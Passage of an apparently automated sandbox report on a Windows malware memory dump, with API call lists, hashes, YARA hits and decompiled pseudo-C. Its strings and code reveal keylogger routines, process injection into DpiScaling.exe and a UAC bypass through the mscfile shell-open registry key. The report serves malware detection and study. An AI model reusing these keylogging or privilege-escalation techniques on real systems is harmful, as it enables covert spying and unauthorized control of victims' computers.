                    • _free.LIBCMT ref: 00448C66
                    • _free.LIBCMT ref: 00448C78
                    • _free.LIBCMT ref: 00448C8A
                    • _free.LIBCMT ref: 00448C9C
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: d0858e0bda40bbe61697d45bdd733b3d4e7997c6a727f8cefd42c9bf3d4b2659
                    • Instruction ID: abb083eb189c983c5d77c8f64225a59d0eec0651e2c7371879094191d40c33d5
                    • Opcode Fuzzy Hash: d0858e0bda40bbe61697d45bdd733b3d4e7997c6a727f8cefd42c9bf3d4b2659
                    • Instruction Fuzzy Hash: 75F06232505610EBE720FB6AE9C5C4B73E9AB41710754081FF249E7600CF39FC908A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 0043D8DA
                      • Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                      • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                    • _free.LIBCMT ref: 0043D8EC
                    • _free.LIBCMT ref: 0043D8FF
                    • _free.LIBCMT ref: 0043D910
                    • _free.LIBCMT ref: 0043D921
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: a7a9538d0cb85230f9e5fc11bbdddd4393d5212c982b8a8952a49a39c05a4c0d
                    • Instruction ID: 5add5f9177ea0066f46c3e8b3c16d1701801f70c1477332ad76d85b4da6d78c6
                    • Opcode Fuzzy Hash: a7a9538d0cb85230f9e5fc11bbdddd4393d5212c982b8a8952a49a39c05a4c0d
                    • Instruction Fuzzy Hash: 08F0FEB1842A209BD7117F95BC424053B60E704728711053BF611E6771FBBA08A1DFDF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E105ACB87(short* __edx) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				short* _v16;
                    				short _v20;
                    				char _v24;
                    				intOrPtr _v28;
                    				char _v80;
                    				void* _t45;
                    				void* _t48;
                    				void* _t59;
                    				intOrPtr _t62;
                    				void* _t64;
                    				intOrPtr _t65;
                    				void* _t67;
                    				intOrPtr _t68;
                    				intOrPtr _t69;
                    				intOrPtr* _t70;
                    				signed int _t71;
                    				short* _t72;
                    				signed int _t76;
                    				intOrPtr* _t79;
                    				void* _t81;
                    				intOrPtr _t82;
                    				intOrPtr* _t85;
                    				void* _t86;
                    				void* _t89;
                    				intOrPtr _t91;
                    				intOrPtr* _t92;
                    				intOrPtr* _t93;
                    				void* _t95;
                    				void* _t96;
                    				void* _t97;
                    				void* _t98;
                    
                    				_v16 = __edx;
                    				_v8 = _v8 & 0;
                    				_v20 = 0;
                    				_v12 = 0;
                    				_v24 = 0;
                    				_v28 = E1059C927();
                    				_t85 = 0x45f57c;
                    				if(__edx == 0) {
                    					L37:
                    					return 0;
                    				}
                    				_t45 = E105CA37E(0x45f57c, 0x465d68, 3);
                    				_t97 = _t96 + 0xc;
                    				if(_t45 == 0) {
                    					L36:
                    					return 1;
                    				}
                    				_t48 = E105CA37E(0x45f57c, 0x465d6c, 7);
                    				_t98 = _t97 + 0xc;
                    				if(_t48 == 0) {
                    					goto L36;
                    				} else {
                    					goto L3;
                    				}
                    				do {
                    					L3:
                    					_t70 = _t85;
                    					_t86 = E105C264E(_t85, 0x4657f0);
                    					if(_t86 != 0) {
                    						_t76 = _t86 - _t70;
                    						L8:
                    						if(_t76 <= 0x31) {
                    							if(_t86 != 0) {
                    								_t89 = _t86 - _t70;
                    								L15:
                    								E105CCB3E( &_v80, _t70, _t89);
                    								_t98 = _t98 + 0xc;
                    								_t11 = _t89 - 1; // -1
                    								_t90 =  ==  ? _t11 : _t89;
                    								_t71 = 0;
                    								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
                    								if(_v28 <= 0) {
                    									L20:
                    									_t72 = _v16;
                    									_t91 = _v12;
                    									goto L21;
                    								}
                    								_t93 = 0x460830;
                    								while(1) {
                    									_t15 = _t93 - 4; // 0x465d50
                    									_t59 = E105CA37E( &_v80,  *_t15, 0x31);
                    									_t98 = _t98 + 0xc;
                    									if(_t59 == 0) {
                    										break;
                    									}
                    									_t67 = E105CA37E( &_v80,  *_t93, 0x31);
                    									_t98 = _t98 + 0xc;
                    									if(_t67 == 0) {
                    										break;
                    									}
                    									_t71 = _t71 + 1;
                    									_t93 = _t93 + 0xc;
                    									if(_t71 < _v28) {
                    										continue;
                    									}
                    									goto L20;
                    								}
                    								_t82 = _v20;
                    								if(_t82 >= 0x12b) {
                    									goto L37;
                    								}
                    								_t76 = _t71 * 0xc;
                    								_t72 = _v16;
                    								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x460834));
                    								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x460835));
                    								_t62 =  *((intOrPtr*)(_t76 + 0x460834));
                    								_v20 = _t82 + 2;
                    								if(_t62 == 0x13) {
                    									L34:
                    									_v8 = 1;
                    									L35:
                    									_t91 = 1;
                    									_v12 = 1;
                    									goto L21;
                    								}
                    								if(_t62 != 0xc0) {
                    									L30:
                    									if(_v8 != 0) {
                    										L32:
                    										if(_v24 == 0) {
                    											_v24 = 1;
                    										}
                    										goto L35;
                    									}
                    									_t64 = E105C264E( &_v80, 0x465d74);
                    									_pop(_t76);
                    									if(_t64 != 0) {
                    										goto L34;
                    									}
                    									goto L32;
                    								}
                    								_t65 =  *((intOrPtr*)(_t76 + 0x460835));
                    								if(_t65 == 0xb4 || _t65 == 0xb5) {
                    									goto L34;
                    								} else {
                    									goto L30;
                    								}
                    							}
                    							_t92 = _t70;
                    							_t76 = _t92 + 1;
                    							do {
                    								_t68 =  *_t92;
                    								_t92 = _t92 + 1;
                    							} while (_t68 != 0);
                    							_t89 = _t92 - _t76;
                    							goto L15;
                    						}
                    						_t89 = 0x31;
                    						goto L15;
                    					}
                    					_t79 = _t70;
                    					_t81 = _t79 + 1;
                    					do {
                    						_t69 =  *_t79;
                    						_t79 = _t79 + 1;
                    					} while (_t69 != 0);
                    					_t76 = _t79 - _t81;
                    					goto L8;
                    					L21:
                    					_t85 = _t86 + 1;
                    				} while (_t86 != 0);
                    				if(_t91 != 0) {
                    					_push(_t76);
                    					 *_t72 = _v20;
                    					 *((char*)(_t72 + 0x154)) = 1;
                    					E105AA1A1(_t72, _v8, _v24, _t76, 1);
                    				}
                    				return _t91;
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: _strstr$_strncpy
                    • String ID: TLS_AES_128_GCM_SHA256
                    • API String ID: 1902495667-731435280
                    • Opcode ID: ea8a7ab8cc127f14d7f4bdee85ec441469228f4643ac61493a581d54cb0a109c
                    • Instruction ID: ed65eee740b7bb4582c9e20e1fcabfdf1242b38b22434af9977a3c819443c17d
                    • Opcode Fuzzy Hash: ea8a7ab8cc127f14d7f4bdee85ec441469228f4643ac61493a581d54cb0a109c
                    • Instruction Fuzzy Hash: 5C517775D0428EDBDF00CEA889957AEBFB8DF80250F14447ADC99AB241E6719D02C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _strpbrk.LIBCMT ref: 004469B8
                    • _free.LIBCMT ref: 00446AD5
                      • Part of subcall function 0043698A: IsProcessorFeaturePresent.KERNEL32(00000017,0043695C,00000000,00000000,?,0046C518,0040D10E,00000000,?,?,0043697C,00000000,00000000,00000000,00000000,00000000), ref: 0043698C
                      • Part of subcall function 0043698A: GetCurrentProcess.KERNEL32(C0000417), ref: 004369AE
                      • Part of subcall function 0043698A: TerminateProcess.KERNEL32(00000000), ref: 004369B5
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                    • String ID: *?$.
                    • API String ID: 2812119850-3972193922
                    • Opcode ID: 137a9f4ad955f4626591eb4d424c202b9ba50c1f2292fbc06302f1bc433b3f7a
                    • Instruction ID: 2df9b6113c9c77aaef819b405c4b5e21061328770e73cee352be1be1b5cbe390
                    • Opcode Fuzzy Hash: 137a9f4ad955f4626591eb4d424c202b9ba50c1f2292fbc06302f1bc433b3f7a
                    • Instruction Fuzzy Hash: 9A51C5B1E00109AFEF14CFA9C841AAEB7B5EF4A314F25816EE454F7300E6799E018B55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\DpiScaling.exe,00000104), ref: 0043CCCA
                    • _free.LIBCMT ref: 0043CD95
                    • _free.LIBCMT ref: 0043CD9F
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Windows\SysWOW64\DpiScaling.exe
                    • API String ID: 2506810119-2099798370
                    • Opcode ID: 92f7cb10a7bdc115734ddf1c20ecddb35b9596ec14b5ff75e0495db2788af7b4
                    • Instruction ID: bf722257b00b3e8486653b7f0e6653974d643c05292d003de6ed1df5b48ba110
                    • Opcode Fuzzy Hash: 92f7cb10a7bdc115734ddf1c20ecddb35b9596ec14b5ff75e0495db2788af7b4
                    • Instruction Fuzzy Hash: DD318F71A00218AFDB21DF99D8C199EBBBCEB89314F10507BF905E7211D7B88A41CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E10595D08(void* __ecx, intOrPtr _a4, char _a8) {
                    				struct _SYSTEMTIME _v20;
                    				char _v44;
                    				char _v68;
                    				void* __ebx;
                    				void* __edi;
                    				intOrPtr _t66;
                    				void* _t68;
                    
                    				_t68 = __ecx;
                    				if( *((char*)(__ecx + 0x50)) != 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				_t66 = _a4;
                    				if(_a8 != 0) {
                    					__eflags =  *0x46bb03;
                    					if(__eflags != 0) {
                    						GetLocalTime( &_v20);
                    						_push(_v20.wMilliseconds & 0x0000ffff);
                    						_push(_v20.wSecond & 0x0000ffff);
                    						_push(_v20.wMinute & 0x0000ffff);
                    						E1059569C(__eflags, E10592E03(E105961B1(0x45f5ec,  &_v44, E10592EF2(0x45f5ec,  &_v68, 0x45f5ec), _t66, __eflags, 0x45f5cc)), _v20.wHour & 0x0000ffff);
                    						E10592E35();
                    						E10592E35();
                    						_push(_t66);
                    						_push(_v20.wMilliseconds & 0x0000ffff);
                    						_push(_v20.wSecond & 0x0000ffff);
                    						_push(_v20.wMinute & 0x0000ffff);
                    						E1059569C(__eflags, E10592E03(E105961B1(0x45f5ec,  &_v68, E10592EF2(0x45f5ec,  &_v44, 0x45f5ec), _t66, __eflags, 0x45f608)), _v20.wHour & 0x0000ffff);
                    						E10592E35();
                    						E10592E35();
                    					}
                    				} else {
                    					 *((char*)(__ecx + 0x64)) = 1;
                    				}
                    				 *((intOrPtr*)(_t68 + 0x5c)) = _t66;
                    				 *((char*)(_t68 + 0x50)) = 1;
                    				 *((intOrPtr*)(_t68 + 0x54)) = CreateEventA(0, 0, 0, 0);
                    				CreateThread(0, 0, 0x40518a, _t68, 0, 0);
                    				return 1;
                    			}

                    APIs
                    • GetLocalTime.KERNEL32(?), ref: 10595D40
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10595DF3
                    • CreateThread.KERNEL32(00000000,00000000,0040518A,?,00000000,00000000), ref: 10595E06
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Create$EventLocalThreadTime
                    • String ID: %02i:%02i:%02i:%03i [Info]
                    • API String ID: 2532271599-1582603680
                    • Opcode ID: ed2aae772cc8f56d28f4b74824591d144166608f12248c5c95cf11805e0c9a5f
                    • Instruction ID: cdbe68ba7170c0f2c3dbe4bbb69218ae0f771ecc668f560d4e14a3632c6f2218
                    • Opcode Fuzzy Hash: ed2aae772cc8f56d28f4b74824591d144166608f12248c5c95cf11805e0c9a5f
                    • Instruction Fuzzy Hash: 8031C475804258BACB10DBA5DC4DEFFBFBCEF99755F00005AF841A2141EA78AA49D770
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SystemParametersInfoW.USER32 ref: 00418005
                      • Part of subcall function 00410AA7: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
                      • Part of subcall function 00410AA7: RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
                      • Part of subcall function 00410AA7: RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseCreateInfoParametersSystemValue
                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                    • API String ID: 4127273184-3576401099
                    • Opcode ID: 1285ab78602569965eea0b6c37ee3638e66d325cccc752a3e8df19547cf9357c
                    • Instruction ID: 364028c2a8d60347ed12ecbe1441f09d0bbbc2a6d5f2fe163c717d7df2f4b183
                    • Opcode Fuzzy Hash: 1285ab78602569965eea0b6c37ee3638e66d325cccc752a3e8df19547cf9357c
                    • Instruction Fuzzy Hash: 9711A532B8474173D818303A4E5BBAF28219746B55F60016BFA462F2C6E8CE4AC742DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E1059A38C(void* __ebx, struct HHOOK__** __ecx) {
                    				char _v28;
                    				void* __edi;
                    				struct HHOOK__** _t29;
                    				void* _t30;
                    				void* _t31;
                    
                    				_t19 = __ebx;
                    				_t29 = __ecx;
                    				_t35 =  *((char*)(__ecx + 0x4a));
                    				if( *((char*)(__ecx + 0x4a)) == 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				E10592EF2(__ebx,  &_v28, 0x45f9f4);
                    				_t31 = _t30 - 0x18;
                    				E105A8148(_t31,  &_v28);
                    				E1059A4A2(__ebx, _t29, _t35);
                    				E10592E35();
                    				_t32 = _t31 - 0x18;
                    				E10592EF2(__ebx, _t31 - 0x18, 0x45f9f4);
                    				E10592EF2(_t19, _t32 - 0x18, "[Info]");
                    				E105A7AEE(_t19, 0x45f9f4);
                    				_t29[0x12] = 0;
                    				CloseHandle(_t29[0xf]);
                    				if(_t29[0x12] == 0 &&  *_t29 != 0) {
                    					UnhookWindowsHookEx( *_t29);
                    					 *_t29 =  *_t29 & 0x00000000;
                    				}
                    				return 1;
                    			}

                    APIs
                      • Part of subcall function 1059A4A2: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 1059A4B0
                      • Part of subcall function 1059A4A2: wsprintfW.USER32 ref: 1059A531
                      • Part of subcall function 1059A4A2: SetEvent.KERNEL32(00000000,00000000), ref: 1059A55B
                      • Part of subcall function 105A7AEE: GetLocalTime.KERNEL32(00000000), ref: 105A7B08
                    • CloseHandle.KERNEL32(?), ref: 1059A3EF
                    • UnhookWindowsHookEx.USER32 ref: 1059A402
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                    • String ID: Online Keylogger Stopped$[Info]
                    • API String ID: 3650414481-1913360614
                    • Opcode ID: 081abe773b2ee0a309f9428bed4f9822964ed0b3ac3228fff158157ab83d7dbd
                    • Instruction ID: 7e1d4f0a4cd82f972439fa908e339998fde8f62e22a418ec7004ab0047c5e293
                    • Opcode Fuzzy Hash: 081abe773b2ee0a309f9428bed4f9822964ed0b3ac3228fff158157ab83d7dbd
                    • Instruction Fuzzy Hash: C6014C34A042205BCF117B34CC0F7BE7F75DB81241F80045DE84602591DBA5285BD3E6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                      • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                      • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                    • CloseHandle.KERNEL32(?), ref: 00409581
                    • UnhookWindowsHookEx.USER32 ref: 00409594
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                    • String ID: Online Keylogger Stopped$[Info]
                    • API String ID: 3650414481-1913360614
                    • Opcode ID: fa00e6ca810f7b458d358df112eb891d89e38a820840c17ff32a5804d1cb9a30
                    • Instruction ID: 0bb2a425696eaad1e840e03cb6b1d67cba19ac7ec2a577a4888382e5ddaa93e6
                    • Opcode Fuzzy Hash: fa00e6ca810f7b458d358df112eb891d89e38a820840c17ff32a5804d1cb9a30
                    • Instruction Fuzzy Hash: 6201F5316002016BD7267B29CC0B7BE7BB58B42305F80006EE981221D3EBBD595AC7DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C119
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 2005118841-1866435925
                    • Opcode ID: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
                    • Instruction ID: fbfdbc6450803e664eb4f4f41a0da8e4bd286e2513790d23a86e9e7a09bff230
                    • Opcode Fuzzy Hash: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
                    • Instruction Fuzzy Hash: 5C01A770644208EAD714E791CC93FBB73549B10744F60853BBE01791C3EA7C5542CA5F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E105A189E(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
                    				void* _v12;
                    				char _v1040;
                    				long _t17;
                    
                    				if(RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12) != 0) {
                    					L3:
                    					return 0;
                    				}
                    				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12);
                    				RegCloseKey(_v12);
                    				if(_t17 != 0) {
                    					goto L3;
                    				}
                    				E105968EA( &_v1040, _a16, _a20);
                    				E10596971( &_v1040, _a8, _a12);
                    				return 1;
                    			}

                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 105A18BA
                    • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 105A18D3
                    • RegCloseKey.ADVAPI32(00000000), ref: 105A18DE
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: origmsc
                    • API String ID: 3677997916-68016026
                    • Opcode ID: 9d7db8807d8695e9d09ea315ff22da239e7ce6c047d71957a7315fb76c5a32cb
                    • Instruction ID: 120787d0aca265dba654f0db1f0873f9620f41a144be19236c7eed1a3ba82976
                    • Opcode Fuzzy Hash: 9d7db8807d8695e9d09ea315ff22da239e7ce6c047d71957a7315fb76c5a32cb
                    • Instruction Fuzzy Hash: 0D01283640022DFBCF119FA0DC09DEF7F69EB05692F004161BA0862060D6318A69EBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410978
                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410993
                    • RegCloseKey.ADVAPI32(00000000), ref: 0041099C
                    Strings
                    • http\shell\open\command, xrefs: 0041096E
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: http\shell\open\command
                    • API String ID: 3677997916-1487954565
                    • Opcode ID: 6e92095d02e46624d881629d473bbed2b7895e2f1f32a5b9a2dde9abf283c6c6
                    • Instruction ID: 1fd5564dc1120aea69868d5849519b592669f7fe773aa548349f028f89f009b1
                    • Opcode Fuzzy Hash: 6e92095d02e46624d881629d473bbed2b7895e2f1f32a5b9a2dde9abf283c6c6
                    • Instruction Fuzzy Hash: 79F0C871500208FBDB10DA95EC09EDFBBBCEB84B52F1040A6B944E1151DA749B85C7A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E105A19BA(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
                    				void* _v8;
                    				signed int _t17;
                    				long _t20;
                    				signed int _t22;
                    				signed int _t23;
                    
                    				_push(__ecx);
                    				_push(_t22);
                    				if(RegCreateKeyW(__ecx, __edx,  &_v8) != 0) {
                    					_t23 = 0;
                    				} else {
                    					_t17 = E105932F7();
                    					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, E10592D59( &_a8), 2 + _t17 * 2);
                    					RegCloseKey(_v8);
                    					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;
                    				}
                    				E10592D5E();
                    				return _t23;
                    			}

                    APIs
                    • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,?), ref: 105A19C5
                    • RegSetValueExW.ADVAPI32(?,0045F724,00000000,00000000,00000000,00000000,0045F724,?,80000001,?,10596E8E,0045F724,C:\Windows\SysWOW64\DpiScaling.exe), ref: 105A19F4
                    • RegCloseKey.ADVAPI32(?,?,80000001,?,10596E8E,0045F724,C:\Windows\SysWOW64\DpiScaling.exe), ref: 105A19FF
                    Strings
                    • Software\Classes\mscfile\shell\open\command, xrefs: 105A19C3
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: Software\Classes\mscfile\shell\open\command
                    • API String ID: 1818849710-505396733
                    • Opcode ID: e3a62b1ecaaca373f1a47cc8b280a2c9c668bc0187830e578af04c97b0f4d5a2
                    • Instruction ID: b3db8f9458e85983fc0cb2e0e36dce7299c7c7787673249df303d25b0e3aa808
                    • Opcode Fuzzy Hash: e3a62b1ecaaca373f1a47cc8b280a2c9c668bc0187830e578af04c97b0f4d5a2
                    • Instruction Fuzzy Hash: AFF04F76441218FBCF009FA0EC09EEE3B6CEB44692F104558B90596165E631EF15DA94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013B7
                    • GetProcAddress.KERNEL32(00000000), ref: 004013BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: GetCursorInfo$User32.dll
                    • API String ID: 1646373207-2714051624
                    • Opcode ID: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
                    • Instruction ID: 2d5915eac24d434730a095519f9524ab5112888a720461ae5624eff83defc800
                    • Opcode Fuzzy Hash: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
                    • Instruction Fuzzy Hash: AAB092B0582B10ABC6007FA0AD0D9087AB4E658B43B2000B3B102C39E5EBB881209F1F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00401472
                    • GetProcAddress.KERNEL32(00000000), ref: 00401479
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetLastInputInfo$User32.dll
                    • API String ID: 2574300362-1519888992
                    • Opcode ID: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
                    • Instruction ID: efdeec6c1e0f4d8d8c2c1c08f07324648747689b8805d4bbb4dbcfd19e195539
                    • Opcode Fuzzy Hash: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
                    • Instruction Fuzzy Hash: F8B092B05427049BC740AFF0AC4DA087A78B644F43B1001A6F142825E9EBB88110AA2F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040148F
                    • GetProcAddress.KERNEL32(00000000), ref: 00401496
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetConsoleWindow$kernel32.dll
                    • API String ID: 2574300362-100875112
                    • Opcode ID: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
                    • Instruction ID: d846cdfbb623d578af620becd0756bbfaced08f68ce80228df047fade16f1a3c
                    • Opcode Fuzzy Hash: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
                    • Instruction Fuzzy Hash: D6B092B05433049BC7509FB0AE5DA097B79A604F87B1000A6F641821E9EEB881009A2F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID:
                    • API String ID: 1036877536-0
                    • Opcode ID: 9d124845995ada22dcd12b1ab66e5f28888bf71f56cbd97164ef69fdac796ab1
                    • Instruction ID: 66ba9c3cc4a36ed88c16bb93380f7ac1aac5537698642897c3979fdba8336104
                    • Opcode Fuzzy Hash: 9d124845995ada22dcd12b1ab66e5f28888bf71f56cbd97164ef69fdac796ab1
                    • Instruction Fuzzy Hash: A0A14672A403869FFB11CE18C8817AEBBE1EF15756F18416FE485AB382C27C9E45C758
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 831bbabb277ed683657504183459677247b461b82b5b035bb98d9dc5ede02f09
                    • Instruction ID: ec6e5165c6e0660f46293b9fdcc1e9d4cfa0c4fde508876c15d21b96f536f29c
                    • Opcode Fuzzy Hash: 831bbabb277ed683657504183459677247b461b82b5b035bb98d9dc5ede02f09
                    • Instruction Fuzzy Hash: A9417D35A00500ABDB206FBA8C45A6F3BA4EF45376F14065FFC18D7293D67C8815866E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E105CD2EF(void* _a4, intOrPtr* _a8) {
                    				char _v5;
                    				intOrPtr _v12;
                    				char _v16;
                    				signed int _t44;
                    				char _t47;
                    				intOrPtr _t50;
                    				signed int _t52;
                    				signed int _t56;
                    				signed int _t57;
                    				void* _t59;
                    				signed int _t63;
                    				signed int _t65;
